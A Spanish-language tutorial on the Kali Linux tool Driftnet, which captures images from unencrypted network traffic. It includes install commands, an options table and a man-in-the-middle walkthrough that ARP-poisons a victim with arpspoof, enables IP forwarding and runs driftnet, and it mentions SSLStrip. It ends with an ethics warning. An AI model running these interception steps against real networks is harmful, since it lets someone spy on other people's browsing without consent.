Driftnet: Captura de Imágenes en Red
Driftnet: Captura de Imágenes en Red
Driftnet es una herramienta de monitoreo de red en Kali Linux diseñada para extraer y mostrar imágenes (y a veces audio) del tráfico TCP que circula por una interfaz de red. Es especialmente conocida en el ámbito del sniffing (husmeo) y ataques de Man-in-the-Middle (MITM).
Aquí tienes una guía rápida en español sobre cómo funciona y cómo usarla.
🛡️ ¿Para qué sirve Driftnet?
Su función principal es "espiar" visualmente lo que otros usuarios ven en su navegador mientras navegan por sitios HTTP (no cifrados).
Captura de imágenes: Extrae archivos JPEG, GIF y PNG del tráfico de red en tiempo real.
Auditoría visual: Permite a un auditor de seguridad ver qué contenido gráfico se está transmitiendo por la red.
Limitación importante: Driftnet no puede ver imágenes de sitios HTTPS (como Facebook, Google o YouTube) a menos que se combine con otras herramientas para romper el cifrado (como SSLStrip).
🚀 Cómo usar Driftnet en Kali Linux
1. Instalación
Si no la tienes instalada, abre una terminal y ejecuta:
sudo apt update
sudo apt install driftnet
2. Uso básico (Modo ventana)
Para empezar a capturar imágenes en tu propia interfaz (por ejemplo, eth0 o wlan0), usa:
sudo driftnet -i eth0
Se abrirá una pequeña ventana negra. En cuanto alguien en la red (o tú mismo) cargue una imagen en una web HTTP, aparecerá ahí.
3. Comandos comunes y opciones
| Comando | Descripción |
-i [interfaz] | Especifica la interfaz de red (ej: wlan0). |
-a | Modo adjunto: No muestra la ventana, guarda las imágenes en un directorio temporal. |
-d [directorio] | Indica dónde guardar las imágenes capturadas. |
-v | Modo verbose, muestra detalles de lo que está ocurriendo en la terminal. |
-x [prefijo] | Añade un prefijo al nombre de los archivos guardados. |
🛠️ Escenario típico: Ataque MITM
Para que Driftnet capture imágenes de otra computadora en la misma red WiFi/LAN, normalmente se usa junto con arpspoof o Ettercap:
Envenenamiento ARP: Engañas a la víctima para que todo su tráfico pase por tu PC.
Bashsudo arpspoof -i eth0 -t [IP_VICTIMA] [IP_ROUTER]Activar reenvío de IP: Para que la víctima no pierda internet.
Bashsudo sysctl -w net.ipv4.ip_forward=1Ejecutar Driftnet:
Bashsudo driftnet -i eth0
⚠️ Nota de seguridad y ética
El uso de Driftnet para espiar redes ajenas sin consentimiento es ilegal. Esta herramienta debe usarse exclusivamente en entornos controlados, laboratorios de ciberseguridad o para auditorías profesionales autorizadas.